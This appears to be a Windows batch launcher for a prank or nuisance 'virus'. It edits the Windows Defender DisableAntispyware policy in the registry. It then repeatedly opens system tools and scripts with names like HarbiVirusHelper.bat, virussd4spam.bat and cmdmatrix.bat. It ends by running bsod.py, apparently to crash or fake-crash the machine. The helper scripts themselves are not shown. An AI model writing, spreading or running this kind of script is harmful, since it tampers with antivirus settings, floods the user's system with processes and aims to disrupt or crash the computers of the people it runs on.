REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntispyware /t REG_DWORD /d 0 /f
cd C:\data
start resmon.exe
start headacher.py
start songer.py
start glitchersounder.py
start UserAccountControlSettings.exe
start wscui.cpl
start winver.exe
start compmgmt.msc
start ipconfig.exe
start inetcpl.cpl
start perfmon.exe
start taskmgr.exe
start msra.exe
start msinfo32.exe
start regedt32.exe
start start.bat
start calc.exe
start regedit
start SD.pyw
start SD2.pyw
start SD3.pyw
start sdsq.pyw
start sdud.py
start randv.py
start HarbiVirusHelper.bat
start virussd4spam.bat
start cmdmatrix.bat
start glitchsound.py
start caps.py
timeout 3
start HarbiVirusHelper.bat
start virussd4spam.bat
start cmdmatrix.bat
start glitchsound.py
timeout 3
start HarbiVirusHelper.bat
start glitchsound.py
start virussd4spam.bat
start cmdmatrix.bat
timeout 3
start HarbiVirusHelper.bat
start glitchsound.py
start virussd4spam.bat
start cmdmatrix.bat
timeout 3
start HarbiVirusHelper.bat
start virussd4spam.bat
start glitchsound.py
start cmdmatrix.bat
start Helper3.bat
timeout 150
start bsod.py
